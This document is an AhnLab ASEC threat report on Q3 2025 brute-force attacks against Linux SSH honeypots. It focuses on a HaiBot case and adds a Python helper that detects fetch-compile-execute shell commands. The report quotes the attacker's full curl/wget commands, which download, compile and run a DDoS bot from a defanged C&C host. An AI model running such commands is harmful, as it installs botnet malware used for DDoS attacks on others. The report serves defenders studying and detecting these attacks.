Statistics Report of Malware Targeting Linux SSH Servers in Q3 2025

AhnLab SEcurity intelligence Center (ASEC) operates a honeypot to detect and categorize brute-force and dictionary attacks that target poorly managed Linux SSH servers. This post covers the attack sources identified in the honeypot logs from the third quarter of 2025 and the statistics of the attacks performed by those sources. It also classifies the malware used in each attack and provides detailed statistics.

1. Status of Attacks on Linux SSH Servers

The following are statistics on attacks against Linux SSH servers identified through AhnLab’s honeypot logs in the third quarter of 2025.

Figure 1. Attacks on Linux SSH servers in the 3rd quarter of 2025

The malware used in these attacks is mostly worms, coin miners, or DDoS bots, with backdoors and other types making up the rest. Although the attacks target servers with SSH services installed, it is worth noting that IoT DDoS bots, which typically target IoT devices, are also being used. Notable examples include Mirai and Gafgyt. Tsunami is another example, but unlike other IoT DDoS bots, it is distributed not only to IoT devices but also to Linux servers. Other Linux DDoS bots include ShellBot and XorDDoS. As for coin miners, there are various cases involving the installation of XMRig, as well as other types such as Prometei and P2PInfect.

2. Attacks in the 3rd Quarter of 2025

In the third quarter of 2025, a HaiBot attack case was identified in which the threat actor built the malware from source code and used it directly. The following Vietnamese string, which instructs the user to enter the correct parameters for the C&C server, suggests that the malware author is likely a Vietnamese speaker. [1]

Figure 2. Vietnamese message set in the C&C server

The threat actor attempted to log in to the honeypot Linux server and, upon success, executed commands of the following kind.

# ( curl -sSL -o build.c "hxxp://api.haitool[.]xyz:25614/files?file_name=build.c" && gcc -o build build.c -lcurl && chmod +x build && ./build) || (curl -sSL -o build "hxxp://api.haitool[.]xyz:25614/files?file_name=build" && chmod +x build && ./build); sleep 10
# sh -c 'curl -s "hxxp://api.haitool[.]xyz:25614/files?file_name=build.c" -o build.c 2>/dev/null || wget -qO build.c "hxxp://api.haitool[.]xyz:25614/files?file_name=build.c" && gcc -o build build.c -lcurl 2>/dev/null && chmod +x build && ./build || (curl -s "hxxp://api.haitool[.]xyz:25614/files?file_name=build" -o build 2>/dev/null || wget -qO build "hxxp://api.haitool[.]xyz:25614/files?file_name=build") && chmod +x build && ./build; sleep 10'\

This command downloads the "build.c" file from the download server, compiles it with gcc, and executes the result. The resulting "build" binary is a downloader that downloads, builds, and executes the Bot and the DDoS tool. The DDoS tool, built under the name "ddos", is a command-line tool that performs DDoS attacks. When the Bot receives a DDoS command from the C&C server, it runs the DDoS tool with the appropriate arguments to carry out the attack.
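As an added example for defenders (not code from the ASEC report or from the malware), the following Python triage helper flags the fetch-compile-execute chain described above in captured shell command lines. The sample commands are constructed for the example and use a placeholder download host, not the report's indicators.

```python
import re

# Constructed sample command lines (not taken from the honeypot logs). The first
# mirrors the download-compile-execute chain described above, with the download
# host replaced by a placeholder instead of a real indicator.
SAMPLE_COMMANDS = [
    '( curl -sSL -o build.c "hxxp://example.invalid:25614/files?file_name=build.c"'
    ' && gcc -o build build.c -lcurl && chmod +x build && ./build ) ||'
    ' ( curl -sSL -o build "hxxp://example.invalid:25614/files?file_name=build"'
    ' && chmod +x build && ./build ); sleep 10',
    'gcc -O2 -o hello hello.c && ./hello',                       # local build only
    'wget -q https://example.invalid/readme.txt -O readme.txt',  # fetch, no exec
]

# curl/wget writing a downloaded file: "-o name", "-O name", "-qO name", ...
FETCH_RE = re.compile(r'\b(?:curl|wget)\b[^|;&]*?-[A-Za-z]*[oO]\s*(\S+)')
# compiler invocation with an explicit output name ("gcc -o build build.c")
COMPILE_RE = re.compile(r'\b(?:gcc|cc|clang|tcc)\b[^|;&]*\s-o\s+(\S+)')
CHMOD_RE = re.compile(r'\bchmod\s+\+x\s+(\S+)')
# execution of a file in the working directory ("./build")
EXEC_RE = re.compile(r'(?:^|[\s;&|(])\./(\S+)')


def analyze(cmd: str) -> dict:
    """Extract fetch/compile/execute artefacts from one shell command line."""
    fetched = set(FETCH_RE.findall(cmd))
    compiled = set(COMPILE_RE.findall(cmd))
    made_exec = set(CHMOD_RE.findall(cmd))
    executed = {name.rstrip(');') for name in EXEC_RE.findall(cmd)}
    if any(n.endswith('.c') for n in fetched) and compiled & executed:
        verdict = 'fetch-compile-execute'   # source pulled, built locally, run
    elif fetched & executed:
        verdict = 'fetch-execute'           # prebuilt binary dropped and run
    elif fetched:
        verdict = 'fetch-only'
    elif compiled & executed:
        verdict = 'local-build'
    else:
        verdict = 'no-indicator'
    return {'verdict': verdict, 'fetched': fetched, 'compiled': compiled,
            'made_executable': made_exec, 'executed': executed}


def flag_suspicious(commands):
    """Return (command, verdict) pairs worth an analyst's attention."""
    results = [(c, analyze(c)['verdict']) for c in commands]
    return [(c, v) for c, v in results
            if v in ('fetch-compile-execute', 'fetch-execute')]
```

Run over the commands recorded by an SSH honeypot or a shell-auditing agent, only the first constructed sample is flagged; a plain local build or a download without execution is left alone.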

Figure 3. Command arguments of the DDoS tool

The DDoS tool supports only UDP flood attacks; the payload of each packet it sends can be NULL, a string of "A" characters of the specified size, or a random string.

The Bot, built under the name "bot_net", connects to the C&C server and periodically receives commands specifying the attack target. If a command contains the victim's IP address and port, the Bot runs the DDoS tool with those arguments to attack the victim's system. Communication with the C&C server proceeds as follows: on initial execution, the Bot sends a message with its status set to report, and afterwards it periodically sends a check message and receives the attack target in the response. So far, no commands specifying an attack target have been observed.

Figure 4. Communication with the C&C server

※ Please refer to the attachment for more details.
